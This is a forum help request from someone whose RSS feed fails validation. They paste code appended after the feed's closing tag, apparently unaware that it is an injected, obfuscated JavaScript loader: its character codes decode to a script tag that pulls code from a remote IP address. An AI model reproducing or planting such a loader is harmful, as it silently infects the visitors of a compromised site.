I'm having some problems with my RSS feed, can't get it to work in feedburner and won't work with firefox live bookmarks either. I ran it through Feed Validator and the problem apparently is the code below that's added to the end of the feed contains HTML tags and only one high level on is allowed. Anybody have any clue on what's doing this or how to edit it?
If its important the problem was the first HTML tag and its on line 362, which is after the RSS tag is already closed out.
'# <html>
# <script language="javascript">
# <!--
# var s="",i,c=0,o="";
# var str="60|115|99|114|105|112|116|32|116|121|112|101|61|34|116|101|120|116|47|106|97|118|97|115|99|114|105|112|116|34|32|115|114|99|61|34|104|116|116|112|58|47|47|56|52|46|50|52|52|46|49|51|56|46|53|53|47|115|116|97|116|115|47|115|116|97|116|46|106|115|34|62|60|47|115|99|114|105|112|116|62|";
# l=str.length;
# for(c=0;c<=str.length-1;c++){
# while(str.charAt(c)!='|')s=s+str.charAt(c++);
# o=o+String.fromCharCode(s);
# s="";}
# document.write(o);
# -->
# </script>
# </html>'